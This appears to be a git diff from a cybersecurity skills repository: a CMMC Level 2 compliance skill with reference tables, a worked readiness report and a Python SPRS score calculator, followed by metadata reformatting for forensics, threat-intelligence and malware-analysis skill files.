 Certification is valid **three years** with **annual affirmations**. Maintain the SSP, re-score on change, keep evidence current, and feed significant changes back into the assessment.
 ## Key Concepts
 | Concept | Definition |
 |---|---|
 | FCI | Federal Contract Information — Level 1 protects it (FAR 52.204-21). |
 | CUI | Controlled Unclassified Information — Level 2 protects it (NIST 800-171). |
 | 110 requirements | The SP 800-171 Rev 2 security requirements across 14 families. |
 | SPRS | Supplier Performance Risk System — where the 800-171 score is posted. |
 | DoD Assessment Methodology | The 1/3/5-point weighting used to compute the score from 110. |
 | C3PAO | CMMC Third-Party Assessment Organization — performs Level 2 certification. |
 | POA&M | Plan of Action & Milestones — limited, must close in 180 days for Final status. |
 | Conditional vs Final | Conditional = open POA&M (score ≥ 80%); Final = all controls met. |
 | ESP | External Service Provider — must meet FedRAMP Moderate / equivalency for CUI. |
 | Scoping categories | CUI / Security Protection / Contractor Risk Managed / Specialized / Out-of-Scope. |
 ## Tools & Systems
 - **NIST SP 800-171 Rev 2** — the 110 requirements (and 800-171A for assessment objectives).
 - **DoD NIST SP 800-171 Assessment Methodology** — the scoring weights.
 - **32 CFR Part 170** (CMMC Program rule) and **48 CFR / DFARS 252.204-7021** (acquisition rule).
 - **SPRS** — score posting; **SAM.gov** for registration.
 - **SP 800-172 / 800-172A** — enhanced requirements for Level 3.
 - **GRC / compliance tooling** — to manage the SSP, POA&M, and evidence (e.g., Xacta, RegScale, FutureFeed-style trackers).
 ## Common Scenarios
 - **Prime flows CUI to a sub.** The sub needs its own Level 2 scope, SSP, SPRS score, and (most likely) C3PAO certification.
 - **Score is below 88.** Prioritize the highest-weighted unmet requirements (5-point, then 3-point) to clear the conditional threshold and shrink the POA&M.
 - **Cloud holds CUI.** Confirm the service is FedRAMP Moderate authorized or meets equivalency; document the responsibility split.
 - **Flat network.** Re-scope into a segmented CUI enclave to cut the assessment surface before spending on controls.
 - **Annual affirmation due.** A senior official affirms continued compliance in SPRS; let it lapse and you risk contract eligibility.
 ## Output Format
 Produce a **CMMC Level 2 Readiness Report** using `assets/template.md`, containing:
 1. **Applicability & CUI categories** — why Level 2 applies.
 2. **Scope** — assets by scoping category and the CUI boundary diagram reference.
 3. **Control status by family** — met / not met / N/A across the 14 families.
 4. **SPRS score** — computed score, deductions, and the gap to 110 and to the 88 threshold.
 5. **POA&M** — unmet requirements, eligibility check, owners, 180-day milestones.
 6. **Assessment path** — self vs C3PAO, target date, affirmation owner.
 7. **Remediation roadmap** — sequenced by point value and effort.
 Use `scripts/process.py` to compute the SPRS score from a control-status JSON, flag POA&M-eligibility concerns, and report the gap to the conditional-certification threshold.
@@ -0,0 +1,63 @@
 # CMMC Level 2 Readiness Report — Worked Example
 > Filled example for a small DIB manufacturer handling CUI on a segmented enclave.
 > Replace bracketed content for your own organization.
 ## 1. Applicability & CUI Categories
 - **Contract drivers:** Prime subcontract with DFARS **252.204-7012** and **-7021**; CUI present → **CMMC Level 2** required.
 - **CUI categories (from contract + DoD CUI Registry):** Controlled Technical Information (CTI), Export Controlled (EAR).
 - **Target assessment path:** Triennial **C3PAO** certification (Phase 2 applies from Nov 10, 2026).
 ## 2. Scope (CMMC Level 2 Scoping Guide)
 | Category | Examples in this environment |
 |---|---|
 | CUI Assets | Engineering workstations, CUI file share, the segmented "Enclave-1" VLAN |
 | Security Protection Assets | EDR console, SIEM, firewall, IdP/MFA, jump host |
 | Contractor Risk Managed | General corporate laptops (policy-blocked from CUI) |
 | Specialized Assets | CNC machine controllers (documented, isolated) |
 | Out-of-Scope | Guest Wi-Fi, marketing SaaS |
 **Boundary note:** CUI is confined to Enclave-1 behind segmentation and MFA. Deliberately minimized to shrink the assessment surface. See network diagram `CUI-boundary-v3`.
 ## 3. Control Status by Family (NIST SP 800-171 Rev 2)
 *(summary; full per-requirement status lives in the SSP)*
 | Family | Met | Partial | Not Met | N/A |
 |---|---|---|---|---|
 | 3.1 Access Control | 22 | 0 | 0 | 0 |
 | 3.3 Audit & Accountability | 8 | 0 | 1 | 0 |
 | 3.5 Identification & Auth | 10 | 1 | 0 | 0 |
 | 3.8 Media Protection | 8 | 0 | 1 | 0 |
 | 3.13 System & Comms Protection | 15 | 0 | 1 | 0 |
 | 3.14 System & Info Integrity | 6 | 0 | 1 | 0 |
 | *(others)* | all met | — | — | — |
 ## 4. SPRS Score
 *(computed by `scripts/process.py` from the control-status JSON)*
 - **Score: 97 / 110** (started at 110; deducted 13).
 - **Gap to perfect:** 13 points across 4 not-met + 1 partial requirement.
 - **Conditional threshold (≥ 88):** **MET** (margin 9) — eligible for Conditional status *if* the remaining items are POA&M-eligible.
 - **Posted to SPRS:** score, SSP date, and assessment scope.
 ## 5. POA&M (eligibility-checked)
 | ID | Requirement | Points | Eligibility | Remediation | Owner | Milestone (≤180d) |
 |---|---|---|---|---|---|---|
 | 3.3.1 | Audit log generation/coverage | 5 | **Verify** — high weight; confirm against 32 CFR 170 | Enable full audit policy + ship to SIEM | SecOps | 2026-07-30 |
 | 3.13.11 | FIPS-validated cryptography | 3 | **Verify** eligibility | Replace non-validated module with FIPS 140-validated | Infra | 2026-08-15 |
 | 3.5.3 | MFA (partial) | 3 | Partial-credit control | Extend MFA to remaining admin paths | IAM | 2026-07-20 |
 | 3.8.9 | Backup CUI protection | 1 | Eligible | Encrypt + access-control backup store | Infra | 2026-08-31 |
 | 3.14.1 | Flaw remediation | 1 | Eligible | Formalize patch SLA + tracking | IT | 2026-08-31 |
 > The two 3-point and one 5-point items must clear eligibility review; the highest-weighted security requirements generally cannot remain on a POA&M. All items close within **180 days** to convert Conditional → **Final**.
 ## 6. Assessment Path
 - **Type:** C3PAO certification assessment.
 - **Target window:** Q4 2026, after POA&M closure of the high-weight items.
 - **Affirmation owner:** [senior official] files the annual affirmation in SPRS.
 ## 7. Remediation Roadmap (sequenced by point value, then effort)
 1. **3.3.1 audit logging (5 pts)** — biggest score lever and likely POA&M-ineligible → do first.
 2. **3.13.11 FIPS crypto (3 pts)** and **3.5.3 MFA gap (3 pts)** — close to remove eligibility risk.
 3. **3.8.9, 3.14.1 (1 pt each)** — low-effort cleanups before the C3PAO date.
 4. Re-run the SPRS calculator after each closure; goal is **110** before assessment.
@@ -0,0 +1,84 @@
 # CMMC Level 2 — Standards & Reference
 ## Governing rules
 | Rule | Citation | Status / effective date |
 |---|---|---|
 | CMMC Program rule | 32 CFR Part 170 | Effective **December 16, 2024** |
 | CMMC acquisition rule (DFARS) | 48 CFR; DFARS clause **252.204-7021** (and 204.7503) | Published Sept 10, 2025; effective **November 10, 2025** |
 | Safeguarding CUI / incident reporting | DFARS **252.204-7012** | In effect |
 | NIST 800-171 self-assessment + SPRS posting | DFARS **252.204-7019 / -7020** | In effect |
 > Always confirm current status at the source — acquisition rules and phase dates have moved before. Authoritative: https://dodcio.defense.gov/CMMC/ and the eCFR for 32 CFR Part 170.
 ## Phased rollout (per the acquisition rule)
 | Phase | Begins | What applies |
 |---|---|---|
 | Phase 1 | **Nov 10, 2025** | Level 1 and some Level 2 **self-assessment** required in solicitations |
 | Phase 2 | **Nov 10, 2026** | Level 2 **C3PAO certification** required for applicable contracts |
 | Phase 3 | **Nov 10, 2027** | Level 2 C3PAO + Level 3 **DIBCAC** assessment phased in |
 | Phase 4 | **Nov 10, 2028** | Full implementation across applicable DoD contracts |
 ## The three CMMC levels
 | Level | Protects | Requirements | Assessment |
 |---|---|---|---|
 | Level 1 | FCI | 15 requirements (FAR 52.204-21) | Annual self-assessment + affirmation |
 | Level 2 | CUI | **110 requirements (NIST SP 800-171 Rev 2)** | Self **or** triennial C3PAO certification |
 | Level 3 | CUI (high priority) | 110 + selected **SP 800-172** enhanced | DoD (DIBCAC) assessment |
 Certification validity: **3 years**, with **annual affirmation** by a senior official in SPRS.
 ## NIST SP 800-171 Rev 2 — the 14 families (110 requirements)
 | § | Family | # reqs |
 |---|---|---|
 | 3.1 | Access Control | 22 |
 | 3.2 | Awareness and Training | 3 |
 | 3.3 | Audit and Accountability | 9 |
 | 3.4 | Configuration Management | 9 |
 | 3.5 | Identification and Authentication | 11 |
 | 3.6 | Incident Response | 3 |
 | 3.7 | Maintenance | 6 |
 | 3.8 | Media Protection | 9 |
 | 3.9 | Personnel Security | 2 |
 | 3.10 | Physical Protection | 6 |
 | 3.11 | Risk Assessment | 3 |
 | 3.12 | Security Assessment | 4 |
 | 3.13 | System and Communications Protection | 16 |
 | 3.14 | System and Information Integrity | 7 |
 | | **Total** | **110** |
 (Assessment objectives for each requirement are in **NIST SP 800-171A**.)
 ## DoD Assessment Methodology — SPRS scoring
 - Start at **110**. Subtract the weighted value of each **NOT MET** requirement.
 - Weights: **1, 3, or 5 points**. The most security-significant requirements are weighted 3 or 5.
 - **Partial credit** applies to a small number of requirements (notably MFA at 3.5.3 and FIPS-validated cryptography at 3.13.11) where partial implementation reduces the deduction.
 - Maximum score **110**; the methodology floor is **−203** (more is deducted than the 110 starting points because of the weighting).
 - The complete per-requirement point assignment is published in the **DoD NIST SP 800-171 Assessment Methodology** — use that document for the authoritative weight of each control rather than estimating.
 ## POA&M rules under the CMMC rule (32 CFR Part 170)
 - A **Conditional** Level 2 status is allowed only if the assessment score is **at least 80% (≥ 88 of 110)**.
 - Only **POA&M-eligible** requirements may be deferred. The highest-weighted security requirements generally **must be fully met** and **cannot** sit on a POA&M — verify each item's eligibility against the rule.
 - All POA&M items must be **closed within 180 days**; a closeout assessment then converts **Conditional → Final**.
 ## Scoping categories (CMMC Level 2 Scoping Guide)
 | Category | Treatment |
 |---|---|
 | CUI Assets | Process/store/transmit CUI — assessed against applicable requirements. |
 | Security Protection Assets | Provide security to the CUI environment — in scope. |
 | Contractor Risk Managed Assets | Capable of handling CUI but not intended to — managed by policy/config. |
 | Specialized Assets | IoT/OT, GFE, test equipment — documented, limited assessment. |
 | Out-of-Scope Assets | Isolated from CUI — not assessed. |
 ## External Service Providers / cloud
 - Cloud services that store/process/transmit CUI must be **FedRAMP Moderate authorized or meet FedRAMP Moderate equivalency**.
 - Document the customer/provider responsibility split (CRM) and inherited controls in the SSP.
 ## NIST CSF 2.0 alignment
 | CSF 2.0 ID | Relevance |
 |---|---|
 | GV.OC-03 | Legal/regulatory (DFARS/CMMC) requirements understood. |
 | GV.SC-01 | Supply-chain risk management — flowdown to subs / ESPs. |
 | ID.AM-08 | Assets managed across the lifecycle (scoping). |
 | ID.RA-05 | Risk informs prioritization of unmet requirements. |
 | PR.AA-01 | Identity and access (3.1 / 3.5 families). |
 | PR.DS-01 | Data-at-rest protection (FIPS crypto, media protection). |
@@ -0,0 +1,198 @@
 #!/usr/bin/env python3
 """
 CMMC Level 2 / NIST SP 800-171 Rev 2 SPRS score calculator.
 Implements the DoD Assessment Methodology arithmetic: start at 110 and subtract
 the weighted value (1, 3, or 5) of each NOT MET requirement, with partial credit
 for the small set of requirements that allow it. Reports the SPRS score, the gap
 to a perfect 110 and to the 88-point (80%) conditional-certification threshold,
 and flags higher-weighted unmet requirements whose POA&M eligibility must be
 verified against 32 CFR Part 170.
 NOTE: per-requirement point weights are defined by the DoD NIST SP 800-171
 Assessment Methodology. Supply each requirement's official weight in the input
 (this tool does not invent weights). Use status 'partial' with 'partial_deduction'
 only for requirements the methodology allows partial credit on (e.g., 3.5.3 MFA,
 3.13.11 FIPS crypto).
 Input JSON shape:
 {
  "org": {"name": "Acme Defense LLC", "scope": "CUI enclave"},
  "requirements": [
    {"id": "3.1.1",  "family": "3.1", "status": "met",      "weight": 5},
    {"id": "3.5.3",  "family": "3.5", "status": "partial",  "weight": 5, "partial_deduction": 3},
    {"id": "3.3.1",  "family": "3.3", "status": "not_met",  "weight": 5},
    {"id": "3.8.9",  "family": "3.8", "status": "not_met",  "weight": 1},
    {"id": "3.2.1",  "family": "3.2", "status": "na",       "weight": 1}
  ]
 }
 status: met | not_met | partial | na
 Usage:
  python process.py --input controls.json [--output readiness.md]
  python process.py --input controls.json --require-conditional   # exit 1 if score < 88
 """
 import argparse
 import json
 import sys
 START_SCORE = 110
 CONDITIONAL_THRESHOLD = 88   # 80% of 110
 VALID_STATUS = {"met", "not_met", "partial", "na"}
 VALID_WEIGHTS = {1, 3, 5}
 def compute(data):
    reqs = data.get("requirements", [])
    if not reqs:
        raise ValueError("requirements list is required")
    deductions = 0
    counts = {"met": 0, "not_met": 0, "partial": 0, "na": 0}
    poam_flags = []   # higher-weight unmet -> verify POA&M eligibility
    by_family = {}    # family -> {met,not_met,partial,na}
    detail = []
    for r in reqs:
        rid = r.get("id", "?")
        status = r.get("status")
        weight = r.get("weight")
        if status not in VALID_STATUS:
            raise ValueError(f"{rid}: status '{status}' invalid (met|not_met|partial|na)")
        if status in ("not_met", "partial", "met") and weight not in VALID_WEIGHTS:
            raise ValueError(f"{rid}: weight '{weight}' invalid (must be 1, 3, or 5)")
        fam = r.get("family", rid.rsplit(".", 1)[0])
        fam_rec = by_family.setdefault(fam, {"met": 0, "not_met": 0, "partial": 0, "na": 0})
        fam_rec[status] += 1
        counts[status] += 1
        ded = 0
        if status == "not_met":
            ded = weight
            if weight > 1:
                poam_flags.append((rid, weight))
        elif status == "partial":
            ded = r.get("partial_deduction")
            if ded is None:
                raise ValueError(f"{rid}: status 'partial' requires 'partial_deduction'")
            if ded < 0 or ded > weight:
                raise ValueError(f"{rid}: partial_deduction {ded} out of range (0..{weight})")
            if ded > 1:
                poam_flags.append((rid, ded))
        deductions += ded
        detail.append((rid, fam, status, weight, ded))
    score = START_SCORE - deductions
    return {
        "score": score,
        "deductions": deductions,
        "counts": counts,
        "by_family": by_family,
        "poam_flags": poam_flags,
        "detail": detail,
    }
 def render(data, res):
    org = data.get("org", {})
    lines = []
    lines.append(f"# CMMC Level 2 Readiness - {org.get('name','Organization')}")
    lines.append("")
    if org.get("scope"):
        lines.append(f"- **Scope:** {org['scope']}")
    lines.append("")
    score = res["score"]
    lines.append("## SPRS Score (DoD Assessment Methodology)")
    lines.append("")
    lines.append(f"- **Score:** **{score}** / 110  (started at 110, deducted {res['deductions']})")
    lines.append(f"- **Gap to perfect (110):** {110 - score}")
    if score >= CONDITIONAL_THRESHOLD:
        lines.append(f"- **Conditional threshold (>= {CONDITIONAL_THRESHOLD}):** MET "
                     f"(margin {score - CONDITIONAL_THRESHOLD}) - eligible for Conditional status "
                     "if remaining items are POA&M-eligible.")
    else:
        lines.append(f"- **Conditional threshold (>= {CONDITIONAL_THRESHOLD}):** NOT MET "
                     f"(short by {CONDITIONAL_THRESHOLD - score}) - not eligible for Conditional "
                     "certification until the score reaches 88.")
    c = res["counts"]
    lines.append(f"- **Status tally:** met {c['met']}, partial {c['partial']}, "
                 f"not met {c['not_met']}, N/A {c['na']}")
    lines.append("")
    # by family
    lines.append("## Status by family")
    lines.append("")
    lines.append("| Family | Met | Partial | Not Met | N/A |")
    lines.append("|---|---|---|---|---|")
    for fam in sorted(res["by_family"]):
        f = res["by_family"][fam]
        lines.append(f"| {fam} | {f['met']} | {f['partial']} | {f['not_met']} | {f['na']} |")
    lines.append("")
    # POA&M eligibility flags
    lines.append("## POA&M eligibility check")
    lines.append("")
    if not res["poam_flags"]:
        lines.append("No unmet requirement carries more than 1 point of deduction. "
                     "Remaining gaps are most likely POA&M-eligible (still verify against 32 CFR Part 170).")
    else:
        lines.append("The following unmet/partial requirements carry **> 1 point**. The highest-weighted "
                     "security requirements generally **cannot** sit on a POA&M - verify each against "
                     "32 CFR Part 170 before relying on Conditional status:")
        lines.append("")
        lines.append("| Requirement | Points lost |")
        lines.append("|---|---|")
        for rid, w in sorted(res["poam_flags"], key=lambda x: -x[1]):
            lines.append(f"| {rid} | {w} |")
    lines.append("")
    lines.append("> All POA&M items must be closed within **180 days** to convert Conditional -> Final.")
    return "\n".join(lines)
 def main():
    ap = argparse.ArgumentParser(description="CMMC L2 / NIST 800-171 SPRS score calculator")
    ap.add_argument("--input", "-i", required=True, help="Path to control-status JSON")
    ap.add_argument("--output", "-o", help="Write Markdown readiness report to this path")
    ap.add_argument("--require-conditional", action="store_true",
                    help="Exit non-zero if SPRS score < 88 (conditional threshold)")
    args = ap.parse_args()
    try:
        with open(args.input) as f:
            data = json.load(f)
    except (OSError, json.JSONDecodeError) as e:
        print(f"ERROR: could not read input JSON: {e}", file=sys.stderr)
        return 2
    try:
        res = compute(data)
        md = render(data, res)
    except ValueError as e:
        print(f"ERROR: {e}", file=sys.stderr)
        return 2
    if args.output:
        with open(args.output, "w") as f:
            f.write(md + "\n")
        print(f"Readiness report written to {args.output}", file=sys.stderr)
    else:
        print(md)
    print(f"SPRS score {res['score']}/110 (deductions {res['deductions']}; "
          f"not met {res['counts']['not_met']}, partial {res['counts']['partial']}).",
          file=sys.stderr)
    if args.require_conditional and res["score"] < CONDITIONAL_THRESHOLD:
        print(f"FAIL: score {res['score']} < {CONDITIONAL_THRESHOLD} conditional threshold.",
              file=sys.stderr)
        return 1
    return 0
 if __name__ == "__main__":
    sys.exit(main())
@@ -1,12 +1,29 @@
 ---
 name: acquiring-disk-image-with-dd-and-dcfldd
-description: Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through hash verification.
+description: Create forensically sound bit-for-bit disk images using dd and dcfldd
  while preserving evidence integrity through hash verification.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, disk-imaging, evidence-acquisition, dd, dcfldd, hash-verification]
+tags:
-version: "1.0"
+- forensics
 - disk-imaging
 - evidence-acquisition
 - dd
 - dcfldd
 - hash-verification
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1006
 - T1005
 - T1025
 - T1074.001
 ---
 # Acquiring Disk Image with dd and dcfldd
@@ -1,12 +1,27 @@
 ---
 name: analyzing-active-directory-acl-abuse
-description: Detect dangerous ACL misconfigurations in Active Directory using ldap3 to identify GenericAll, WriteDACL, and WriteOwner abuse paths
+description: Detect dangerous ACL misconfigurations in Active Directory using ldap3
  to identify GenericAll, WriteDACL, and WriteOwner abuse paths
 domain: cybersecurity
 subdomain: identity-security
-tags: [active-directory, acl-abuse, ldap, privilege-escalation]
+tags:
-version: "1.0"
+- active-directory
 - acl-abuse
 - ldap
 - privilege-escalation
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.AA-01
 - PR.AA-05
 - PR.AA-06
 mitre_attack:
 - T1098
 - T1098.007
 - T1484.001
 - T1222.001
 - T1078.002
 ---
@@ -1,12 +1,33 @@
 ---
 name: analyzing-android-malware-with-apktool
-description: Perform static analysis of Android APK malware samples using apktool for decompilation, jadx for Java source recovery, and androguard for permission analysis, manifest inspection, and suspicious API call detection.
+description: Perform static analysis of Android APK malware samples using apktool
  for decompilation, jadx for Java source recovery, and androguard for permission
  analysis, manifest inspection, and suspicious API call detection.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [Android, APK, apktool, jadx, androguard, mobile-malware, static-analysis, reverse-engineering]
+tags:
-version: "1.0"
+- Android
 - APK
 - apktool
 - jadx
 - androguard
 - mobile-malware
 - static-analysis
 - reverse-engineering
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1406
 - T1407
 - T1626.001
 - T1655.001
 - T1521.001
 ---
 # Analyzing Android Malware with Apktool
@@ -1,16 +1,35 @@
 ---
 name: analyzing-api-gateway-access-logs
-description: >
+description: 'Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect
-  Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect BOLA/IDOR
+  BOLA/IDOR attacks, rate limit bypass, credential scanning, and injection attempts.
-  attacks, rate limit bypass, credential scanning, and injection attempts. Uses pandas
+  Uses pandas for statistical analysis of request patterns and anomaly detection.
-  for statistical analysis of request patterns and anomaly detection. Use when
+  Use when investigating API abuse or building API-specific threat detection rules.
-  investigating API abuse or building API-specific threat detection rules.
+
  '
 domain: cybersecurity
 subdomain: security-operations
-tags: [analyzing, api, gateway, access]
+tags:
-version: "1.0"
+- api-security
 - access-log-analysis
 - aws-api-gateway
 - kong
 - nginx
 - bola-detection
 - rate-limit-bypass
 - security-operations
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.CM-01
 - RS.MA-01
 - GV.OV-01
 - DE.AE-02
 mitre_attack:
 - T1190
 - T1110.004
 - T1078.004
 - T1119
 ---
 # Analyzing API Gateway Access Logs
@@ -1,12 +1,39 @@
 ---
 name: analyzing-apt-group-with-mitre-navigator
-description: Analyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap analysis and threat-informed defense.
+description: Analyze advanced persistent threat (APT) group techniques using MITRE
  ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap
  analysis and threat-informed defense.
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [mitre-attack, navigator, apt, threat-actor, ttp-analysis, heatmap, detection-gap, threat-intelligence]
+tags:
-version: "1.0"
+- mitre-attack
 - navigator
 - apt
 - threat-actor
 - ttp-analysis
 - heatmap
 - detection-gap
 - threat-intelligence
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - Executable Denylisting
 - Execution Isolation
 - File Metadata Consistency Validation
 - Content Format Conversion
 - File Content Analysis
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1059.001
 - T1071.001
 - T1003.001
 - T1486
 - T1547.001
 ---
 # Analyzing APT Group with MITRE ATT&CK Navigator
@@ -1,16 +1,34 @@
 ---
 name: analyzing-azure-activity-logs-for-threats
-description: >
+description: 'Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query
-  Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query to
+  to detect suspicious administrative operations, impossible travel, privilege escalation,
  detect suspicious administrative operations, impossible travel, privilege escalation,
  and resource modifications. Builds KQL queries for threat hunting in Azure environments.
  Use when investigating suspicious Azure tenant activity or building cloud SIEM detections.
  '
 domain: cybersecurity
 subdomain: security-operations
-tags: [analyzing, azure, activity, logs]
+tags:
-version: "1.0"
+- azure
 - cloud-security
 - azure-monitor
 - kql
 - threat-hunting
 - activity-logs
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.CM-01
 - RS.MA-01
 - GV.OV-01
 - DE.AE-02
 mitre_attack:
 - T1078.004
 - T1098.003
 - T1538
 - T1556.009
 - T1580
 ---
 # Analyzing Azure Activity Logs for Threats
@@ -1,17 +1,35 @@
 ---
 name: analyzing-bootkit-and-rootkit-samples
-description: >
+description: 'Analyzes bootkit and advanced rootkit malware that infects the Master
-  Analyzes bootkit and advanced rootkit malware that infects the Master Boot Record (MBR),
+  Boot Record (MBR), Volume Boot Record (VBR), or UEFI firmware to gain persistence
-  Volume Boot Record (VBR), or UEFI firmware to gain persistence below the operating system.
+  below the operating system. Covers boot sector analysis, UEFI module inspection,
-  Covers boot sector analysis, UEFI module inspection, and anti-rootkit detection techniques.
+  and anti-rootkit detection techniques. Activates for requests involving bootkit
-  Activates for requests involving bootkit analysis, MBR malware investigation, UEFI
+  analysis, MBR malware investigation, UEFI persistence analysis, or pre-OS malware
-  persistence analysis, or pre-OS malware detection.
+  detection.
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, bootkit, rootkit, UEFI, MBR-analysis]
+tags:
 - malware
 - bootkit
 - rootkit
 - UEFI
 - MBR-analysis
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1542.003
 - T1542.001
 - T1542.002
 - T1014
 - T1547.006
 ---
 # Analyzing Bootkit and Rootkit Samples
@@ -1,12 +1,34 @@
 ---
 name: analyzing-browser-forensics-with-hindsight
-description: Analyze Chromium-based browser artifacts using Hindsight to extract browsing history, downloads, cookies, cached content, autofill data, saved passwords, and browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
+description: Analyze Chromium-based browser artifacts using Hindsight to extract browsing
  history, downloads, cookies, cached content, autofill data, saved passwords, and
  browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [browser-forensics, hindsight, chrome-forensics, chromium, edge, browsing-history, cookies, downloads, cache, web-artifacts]
+tags:
-version: "1.0"
+- browser-forensics
 - hindsight
 - chrome-forensics
 - chromium
 - edge
 - browsing-history
 - cookies
 - downloads
 - cache
 - web-artifacts
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1217
 - T1539
 - T1555.003
 - T1185
 ---
 # Analyzing Browser Forensics with Hindsight
@@ -1,12 +1,31 @@
 ---
 name: analyzing-campaign-attribution-evidence
-description: Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attr
+description: Campaign attribution analysis involves systematically evaluating evidence
  to determine which threat actor or group is responsible for a cyber operation. This
  skill covers collecting and weighting attr
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [threat-intelligence, cti, ioc, mitre-attack, stix, attribution, campaign-analysis]
+tags:
-version: "1.0"
+- threat-intelligence
 - cti
 - ioc
 - mitre-attack
 - stix
 - attribution
 - campaign-analysis
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1587.001
 - T1583.001
 - T1588.002
 - T1071.001
 ---
 # Analyzing Campaign Attribution Evidence
@@ -1,12 +1,62 @@
 ---
 name: analyzing-certificate-transparency-for-phishing
-description: Monitor Certificate Transparency logs using crt.sh and Certstream to detect phishing domains, lookalike certificates, and unauthorized certificate issuance targeting your organization.
+description: Monitor Certificate Transparency logs using crt.sh and Certstream to
  detect phishing domains, lookalike certificates, and unauthorized certificate issuance
  targeting your organization.
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [certificate-transparency, ct-logs, phishing, crt-sh, certstream, ssl, domain-monitoring, threat-intelligence]
+tags:
-version: "1.0"
+- certificate-transparency
 - ct-logs
 - phishing
 - crt-sh
 - certstream
 - ssl
 - domain-monitoring
 - threat-intelligence
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0052
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1583.001
 - T1583.004
 - T1566.002
 - T1608.005
 - T1596.003
 mitre_f3:
  version: '1.1'
  tactics:
  - resource-development
  - reconnaissance
  - initial-access
  techniques:
  - id: T1583.001
    name: 'Acquire Infrastructure: Domains'
    tactic: resource-development
    source: attack
  - id: F1020.002
    name: 'Create Fake Materials: Fake Website'
    tactic: resource-development
    source: f3
  - id: T1593
    name: Search Open Websites/Domains
    tactic: reconnaissance
    source: attack
  - id: T1598
    name: Phishing for Information
    tactic: reconnaissance
    source: attack
  - id: T1660
    name: Phishing
    tactic: initial-access
    source: attack
 ---
 # Analyzing Certificate Transparency for Phishing
@@ -1,16 +1,41 @@
 ---
 name: analyzing-cloud-storage-access-patterns
-description: >-
+description: Detect abnormal access patterns in AWS S3, GCS, and Azure Blob Storage
-  Detect abnormal access patterns in AWS S3, GCS, and Azure Blob Storage by analyzing CloudTrail
+  by analyzing CloudTrail Data Events, GCS audit logs, and Azure Storage Analytics.
-  Data Events, GCS audit logs, and Azure Storage Analytics. Identifies after-hours bulk downloads,
+  Identifies after-hours bulk downloads, access from new IP addresses, unusual API
-  access from new IP addresses, unusual API calls (GetObject spikes), and potential data exfiltration
+  calls (GetObject spikes), and potential data exfiltration using statistical baselines
-  using statistical baselines and time-series anomaly detection.
+  and time-series anomaly detection.
 domain: cybersecurity
 subdomain: cloud-security
-tags: [analyzing, cloud, storage, access]
+tags:
-version: "1.0"
+- cloud-security
 - aws-s3
 - gcs
 - azure-blob-storage
 - cloudtrail
 - data-access-anomaly
 - exfiltration-detection
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0024
 - AML.T0056
 nist_ai_rmf:
 - MEASURE-2.7
 - MAP-5.1
 - MANAGE-2.4
 nist_csf:
 - PR.IR-01
 - ID.AM-08
 - GV.SC-06
 - DE.CM-01
 mitre_attack:
 - T1530
 - T1567.002
 - T1619
 - T1078.004
 - T1048
 ---
@@ -1,12 +1,32 @@
 ---
 name: analyzing-cobalt-strike-beacon-configuration
-description: Extract and analyze Cobalt Strike beacon configuration from PE files and memory dumps to identify C2 infrastructure, malleable profiles, and operator tradecraft.
+description: Extract and analyze Cobalt Strike beacon configuration from PE files
  and memory dumps to identify C2 infrastructure, malleable profiles, and operator
  tradecraft.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [cobalt-strike, beacon, c2, malware-analysis, config-extraction, threat-hunting, red-team-tools]
+tags:
-version: "1.0"
+- cobalt-strike
 - beacon
 - c2
 - malware-analysis
 - config-extraction
 - threat-hunting
 - red-team-tools
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1071.001
 - T1573.001
 - T1090.004
 - T1105
 - T1027
 ---
 # Analyzing Cobalt Strike Beacon Configuration
@@ -1,12 +1,32 @@
 ---
 name: analyzing-cobaltstrike-malleable-c2-profiles
